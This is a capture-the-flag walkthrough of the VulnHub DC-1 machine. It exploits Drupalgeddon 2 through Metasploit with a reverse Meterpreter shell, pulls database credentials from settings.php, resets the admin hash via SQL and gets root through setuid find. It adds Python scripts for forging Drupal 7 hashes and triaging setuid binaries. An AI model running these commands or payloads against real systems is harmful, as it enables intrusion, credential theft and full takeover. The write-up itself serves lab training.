Vulnhub Walkthrough Handbook: 01 DC-1

Background:

Download: https://www.vulnhub.com/entry/dc-1-1,292/

Target IP in this run: 192.168.2.11

Key techniques:

  • Exploiting Drupal 7 (CVE-2018-7600, Drupalgeddon 2)
  • Privilege escalation through the setuid find binary

1. Information gathering

1.1 Locating the target's IP

Sweep the local segment with arp-scan -l; the result:

└─# arp-scan -l            
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 192.168.2.253
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.2.2     ec:3c:bb:ae:b7:45       Huawei Device Co., Ltd.
192.168.2.11    00:0c:29:a7:2b:2f       VMware, Inc.

The only other VMware guest answering on the segment is 192.168.2.11 (00:0c:29:a7:2b:2f), so that is the target; 192.168.2.2 is the Huawei router.

1.2 Scanning the target's open ports

Scan the full TCP range with nmap -sS -Pn -p 1-65535 192.168.2.11 (-Pn skips host discovery, which is why nmap warns about it; a follow-up run with -sV would add service banners). The result:

└─# nmap -sS -Pn -p 1-65535 192.168.2.11           // scan all TCP ports
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 09:37 CST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 88.53% done; ETC: 09:37 (0:00:01 remaining)
Nmap scan report for 192.168.2.11
Host is up (0.00080s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
37297/tcp open  unknown
MAC Address: 00:0C:29:A7:2B:2F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 9.27 seconds

The target exposes TCP 22 (SSH), 80 (HTTP), 111 (rpcbind) and 37297; the high port is most likely an RPC service registered with rpcbind rather than a separate application. The web server is the way in.

1.3 Fingerprinting

  1. The Yujian (御剑) web fingerprinting tool, pointed at http://192.168.2.11 (the HTTP service found on port 80), identifies the application as Drupal but gives no version. CMSeeK narrows it down: python3 cmseek.py -u 192.168.2.11 reports Drupal 7.

  2. httprint identifies the web server as Apache/2.2.22 (Debian).

2. Getting a shell

Searching for Drupal 7 vulnerabilities turns up CVE-2018-7600 (Drupalgeddon 2): unauthenticated remote code execution in Drupal 7.x before 7.58 and 8.x before 8.5.1, caused by the Form API rendering attacker-controlled render-array properties (such as #post_render) supplied in request parameters. Metasploit has a module for it, so we try that first.

└─# msfdb run                     // start Metasploit together with its database
[+] Starting database

       =[ metasploit v6.0.45-dev                          ]
+ -- --=[ 2134 exploits - 1139 auxiliary - 364 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

[*] Starting persistent handler(s)...
msf6 > search drupal                         // search for Drupal modules

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2       // select the Drupalgeddon 2 module
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options            // list the module's options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path
                                           >'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.19     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.2.11
RHOSTS => 192.168.2.11                           // target host
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 80
RPORT => 80                      // target port (already the default)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run                 // launch the exploit

[*] Started reverse TCP handler on 192.168.2.19:4444 
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.2.11
[*] Meterpreter session 1 opened (192.168.2.19:4444 -> 192.168.2.11:56933) at 2021-12-09 17:23:21 +0800

meterpreter > shell                // drop into a system shell
Process 3338 created.
Channel 0 created.

We have a shell. Two things worth noting from the output: LHOST defaulted to the attacker's address 192.168.2.19, which needs to be set by hand on a machine with several interfaces; and the module's automatic check reported "could not be validated", meaning it fired the exploit without confirming the version first. The session proves the target was vulnerable, but on an engagement that warning is the cue to fingerprint the release before throwing an exploit.

3. Privilege escalation

  1. Upgrade to an interactive shell. The shell Meterpreter hands us is not a full TTY; on a system with Python installed, the pty module creates a proper terminal in one line. In the shell, run python -c 'import pty; pty.spawn("/bin/bash")':
python -c 'import pty;pty.spawn("/bin/bash")'    // spawn a real terminal
www-data@DC-1:/var/www$ 

www-data@DC-1:/var/www$ whoami                   // check the current user
whoami
www-data
  2. ls in the web root shows a flag1.txt file.
www-data@DC-1:/var/www$ ls                   // list the web root
ls
COPYRIGHT.txt       MAINTAINERS.txt  flag1.txt    profiles    web.config
INSTALL.mysql.txt   README.txt       includes     robots.txt  xmlrpc.php
INSTALL.pgsql.txt   UPGRADE.txt      index.php    scripts
INSTALL.sqlite.txt  abc              install.php  sites
INSTALL.txt         authorize.php    misc         themes
LICENSE.txt         cron.php         modules      update.php
www-data@DC-1:/var/www$ cat flag1.txt        // read flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.

flag1.txt tells us to look at the CMS configuration file. Drupal keeps it in sites/default/settings.php; reading /var/www/sites/default/settings.php reveals the database name drupaldb, the database user dbuser and its password R0ck3t.

  3. Reset the Drupal admin password. Drupal 7 stores salted, iterated SHA-512 hashes, so a plaintext cannot simply be written into the users table. Generate a hash for the new password with the script that ships in the web root, php /var/www/scripts/password-hash.sh password (run it from /var/www: the script resolves DRUPAL_ROOT from the current directory), then connect to MySQL with the dbuser credentials and replace the admin user's hash:
update drupaldb.users set pass="$S$DgNSiYzRbilwq18C5.D/pnvrvdoKncm5WxBG7AIDqwFNKDi0TJCL" where name="admin";
The hash must be pasted whole: a Drupal 7 hash is exactly 55 characters with no whitespace, and any stray or missing character makes the login fail. Now log in to the site as admin with the password password. flag3 points at find's -exec option as the route to root.

  4. Escalate through a setuid binary. Listing files with the setuid bit that are owned by root shows /usr/bin/find among them. A setuid-root find runs with root's effective UID, and whatever -exec launches inherits it, so spawning a shell from find gives a root shell (/bin/sh on Debian is dash, which keeps the elevated UID; bash would drop it unless started with -p). With root, read the final flag in /root.
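The password reset in step 3 depends on producing a hash in exactly the form Drupal 7 expects, and password-hash.sh is only usable with shell access to the web root. The following is an added example (not Drupal's code and not from this writeup) that ports the Drupal 7 algorithm as I know it from includes/password.inc: a 12-character setting string ($S$, one character encoding log2 of the round count, 8 characters of salt), SHA-512 over salt plus password, 2^15 further rounds, phpass-style base64 of the digest, and truncation of the whole string to 55 characters. It lets you mint a replacement hash offline, verify a hash pulled from the users table against a guess, and build the UPDATE statement with the hash pasted intact; the table name drupaldb.users is the one from the writeup's own query.

```python
"""Drupal 7 password hashing (the algorithm behind scripts/password-hash.sh):
salted, iterated SHA-512 with phpass-style encoding, truncated to 55 characters.
Added example reimplementing the algorithm; not Drupal's own code."""
import hashlib
import hmac
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH
DEFAULT_COUNT_LOG2 = 15     # DRUPAL_HASH_COUNT: 2**15 = 32768 rounds
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30


def _encode64(data: bytes) -> str:
    """phpass-style base64, as Drupal's _password_base64_encode() does it."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def generate_setting(count_log2: int = DEFAULT_COUNT_LOG2) -> str:
    """'$S$' + one char for log2(rounds) + 8 chars of salt from 6 random bytes."""
    return "$S$" + ITOA64[count_log2] + _encode64(os.urandom(6))


def drupal7_crypt(password: str, setting: str) -> str:
    """Port of _password_crypt('sha512', ...). Pass an existing hash as the setting to
    verify it (only its first 12 chars are used), or a fresh setting to create one."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        raise ValueError("bad setting string")
    count_log2 = ITOA64.index(setting[3])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        raise ValueError("iteration count out of range")
    salt, pw = setting[4:12].encode(), password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _encode64(digest))[:HASH_LENGTH]


def hash_password(password: str) -> str:
    """What password-hash.sh prints: a fresh salt, so the output differs each run."""
    return drupal7_crypt(password, generate_setting())


def check_password(password: str, stored: str) -> bool:
    if not stored.startswith("$S$") or len(stored) != HASH_LENGTH:
        return False
    return hmac.compare_digest(drupal7_crypt(password, stored), stored)


def reset_sql(username: str, new_hash: str, table: str = "drupaldb.users") -> str:
    """The UPDATE from the writeup; refuses a hash that is not exactly 55 characters."""
    if len(new_hash) != HASH_LENGTH or "'" in username:
        raise ValueError("refusing to build statement")
    return f"UPDATE {table} SET pass='{new_hash}' WHERE name='{username}';"


if __name__ == "__main__":
    h = hash_password("password")
    print(h)
    print(reset_sql("admin", h))
```

check_password("password", <hash copied from the writeup>) is a quick way to confirm that a hash survived copy-and-paste intact before you put it in the database; reset_sql uses single quotes, and will reject the hash if a space crept in.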

www-data@DC-1:/var/www$ find / -user root -perm -4000 -print 2>/dev/null   // list setuid-root files
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

www-data@DC-1:/var/www$ mkdir abc                   // any existing path will do as find's starting point

www-data@DC-1:/var/www$ find abc -exec '/bin/sh' \;  // setuid find launches /bin/sh as root
find abc -exec '/bin/sh' \;
# whoami                                            // check the current user
whoami
root
# cd /root                                          // enter root's home directory
cd /root
# ls
ls
thefinalflag.txt
# cat thefinalflag.txt                              // read the final flag
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
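The find -user root -perm -4000 sweep above is the whole of the setuid enumeration; what turns a list of eighteen paths into a decision is knowing which ones hand out a shell. The script below is an added example (not from this writeup) that does the same walk in Python, with the same two conditions as the find expression (setuid bit set, owner root), skipping /proc, /sys and /dev, and then splits the hits into a small list of binaries known to be abusable when setuid (a selection of GTFOBins SUID entries, by no means complete) and everything else. The demo() function builds a temporary tree with one setuid file owned by the current user so the logic can be exercised without root; the owner check is parameterised for that reason.

```python
"""Enumerate setuid binaries owned by root (what 'find / -user root -perm -4000' does) and
flag the ones known to hand out a shell. Added example, not part of the writeup."""
import os
import stat
import tempfile

# Short selection of binaries that give a shell or arbitrary file access when setuid
# (GTFOBins-style); not exhaustive, and some distro builds deliberately drop privileges.
ABUSABLE = {"find", "vim", "vi", "nano", "less", "more", "bash", "sh", "dash", "python",
            "perl", "awk", "gawk", "env", "cp", "mv", "tee", "nmap", "xxd"}
PSEUDO_FS = ("/proc", "/sys", "/dev")


def find_suid(root: str = "/", owner_uid: int = 0):
    """Regular files under root with the setuid bit whose owner is owner_uid (0 = root)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # do not descend into pseudo filesystems
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: a symlink's own mode bits are irrelevant
            except OSError:
                continue
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID
                    and st.st_uid == owner_uid):
                hits.append(path)
    return sorted(hits)


def triage(paths):
    """Split paths into (known-abusable, other); 'python2.7' matches 'python' by its stem."""
    abusable, other = [], []
    for p in paths:
        base = os.path.basename(p)
        stem = base.rstrip("0123456789.")
        (abusable if base in ABUSABLE or stem in ABUSABLE else other).append(p)
    return abusable, other


def demo():
    """Offline demo on a constructed tree: one setuid file (owned by us) and one plain file."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    suid_path = os.path.join(root, "usr", "bin", "find")
    plain_path = os.path.join(root, "bin", "ls")
    for p in (suid_path, plain_path):
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(suid_path, 0o4755)    # setuid bit; the owner is our own uid, so scan for that
    os.chmod(plain_path, 0o755)
    hits = find_suid(root, owner_uid=os.getuid())
    abusable, other = triage(hits)
    return {"hits": hits, "abusable": abusable, "other": other, "expected": suid_path}


if __name__ == "__main__":
    flagged, rest = triage(find_suid())
    for p in flagged:
        print("setuid root, known abusable:", p)
    print(len(rest), "other setuid-root files")
```

On DC-1 the only hit in the abusable list is /usr/bin/find, which is why the writeup's find abc -exec '/bin/sh' \; lands a root prompt; the remaining entries (mount, su, passwd, exim4 and so on) are the normal setuid set on a Debian host and are not shortcuts on their own.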